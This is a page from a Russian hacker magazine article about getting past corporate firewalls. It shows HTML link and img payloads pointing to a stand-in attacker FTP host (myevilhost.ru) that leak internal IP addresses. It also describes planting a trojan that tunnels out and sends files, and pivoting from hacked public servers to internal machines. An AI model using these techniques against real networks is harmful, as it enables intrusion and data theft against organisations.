АТАКА проходим сквозь фаерволл

GREEN (green@rootshell.ru)

Спецвыпуск Xakep, номер #024, стр. 024-018-2


НЕ ИРЦЕМ ЕДИНЫМ...

Даже если в конторе никто не юзает irc, еще не все потеряно - ведь у нас в запасе есть очень богатый возможностями протокол ftp. Можно попытаться заставить кого-то из внутренней сети нажать на ссылку, подобную этой: <a href="ftp://myevilhost.ru:1111/pub/somefile">. В данном случае myevilhost.ru - это комп, на котором у тебя есть возможность запустить сервер на 1111-м порту (либо на любом другом, тогда нужно поправить ссылку). На 1111-м порту нужно запустить модифицированный ftp-сервер, который будет запоминать все PORT-команды. В случае, если клиент не ходит через ftp/http-прокси, - это, наверняка, сработает, и ты увидишь в созданном логе строчки наподобие этой: PORT 1,2,3,4,0,44452. Это значит, что у клиента был адрес 1.2.3.4. Подобную ссылку можно завернуть в письмо, посланное внутрь сети. Но если <a href="..."> ссылка требует ручного нажатия, что не всегда удобно, то <img src="ftp://myevilhost.ru:1111/pub/somefile"> может выполниться и само по себе. Зачем утруждать клиента :)?

ХОД КОНЕМ

Еще одним способом получить множество информации о внутренностях сети является засылка туда трояна, который может не только узнать используемые внутри сети адреса, но также установить туннель с твоим хостом для удобства исследования сети, собрать и отослать нужные файлы и тому подобное. К сожалению, этот способ эффективен, только если широко расплодившиеся в последнее время антивирусы не уничтожат твоего троянца по пути к месту назначения, и к тому же внутри сети трояну удастся запуститься. Мы рассмотрим кое-какие триксы, применяемые в троянах ниже.

ПУБЛИЧНЫЕ СЕРВЕРА В ОДНОЙ СЕТИ С ВНУТРЕННИМИ КОМПАМИ

Не так уж редко можно столкнуться с архитектурой, при которой за фаерволлом сидят сервера и рабочие станции внутри одной сети. При этом часть серверов находится в публичном доступе, и фаерволл пропускает пакеты к этим серверам, а часть серверов и рабочие компы фаерволлом прикрыты и имеют, например, адреса из private address space типа 192.168.0.0/16. В этом случае полностью применимо все сказанное выше относительно сервисов на фаерволле, то есть, сломав один из таких видимых снаружи серверов, получаем полный доступ в локальную сеть. К тому же, сломав один из серверов, можно получить расширенный доступ и к соседним серверам. Мало кто станет закрывать свои сервера друг от друга, и если снаружи зайти на 139-й порт windows-серверов не удастся из-за фаерволла, то сделать это изнутри скорей всего удастся.

Назад на стр. 024-018-1  Содержание  Вперед на стр. 024-018-3